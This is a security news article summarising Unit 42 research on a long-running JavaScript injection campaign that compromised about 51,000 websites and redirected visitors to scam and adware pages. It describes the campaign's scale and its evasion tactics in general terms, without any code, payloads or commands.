3-Year JS Injection Campaign Targets 51,000 WebsitesCampaign Peaked in 2022, Continues to Infect Websites Using Obfuscation Tactics
Unit 42 researchers have been tracking this activity through 2022 and it continues to infect websites in 2023. They suspect the campaign "has impacted a large number of people, since hundreds of these infected websites were ranked in Tranco's top million websites."
Victims are typically redirected to an adware or a scam page, mostly masquerading as a well-known video-sharing platform or deceptive content that tricks victims into allowing an attacker-controlled website to send browser notifications.
"We also found that this campaign is multifaceted in that it performs multistep injections before redirecting to malicious web pages," said researchers, adding that it "uses obfuscation and benign append attacks to bypass detections."
The first instance of the campaign was observed in 2020 and the latest variants of this campaign were tracked between January 2022 and January 2023.
Researchers have detected the malware on an estimated 170,000 URLs from 51,000 hostnames since the beginning of 2022.
The campaign peaked between May and August 2022, when researchers spotted an average of 4,000 daily URLs. In January 2023, researchers said, they blocked about 240,000 sessions from these websites across 14,773 devices.
The campaign uses various techniques to bypass detection, including obfuscation, appending code to large benign files and multistep injections.
In obfuscation, the injected JS code was obfuscated to hide the malicious payload to bypass detection. This code hides the external URL that is used to load the malicious JS code and adds it to the document object model.
In appending code to large benign files, the threat actors were able to evade detection by security crawlers.
In the samples observed by the researchers, injected malicious JS code in large JS files was similar to the live detection examples of benign append attacks.
In all the above cases, researchers observed that the injected JS code appends external malicious JS code by manipulating the document object model, which gives the attacker the ability to change the malicious payload.
"A more recent variant of this campaign injects malicious JS code onto a website. It then performs a series of intermediate JS injections before loading a payload that redirects victims to a malicious webpage," the researchers said. "One reason for including JS injections from different websites could be that attackers want to keep changing the URL that loads the final payload, in case the URL loading JS is blacklisted by security crawlers."
The final payload redirected victims to different websites before landing on the final scam webpage.
Unit42 researchers suspect that a large number of websites may be compromised due to vulnerable content management system plug-ins. Researchers observed around three-quarters of the 51,000 exploited websites were using a popular, unnamed CMS.
"The injected malicious JS code was included on the homepage of more than half of the detected websites. One common tactic used by the campaign's operators was to inject malicious JS code on frequently used JS filenames that are likely to be included on the homepages of compromised websites," the researchers said.
This tactic helped attackers target legitimate website users who are more likely to visit the website's home page.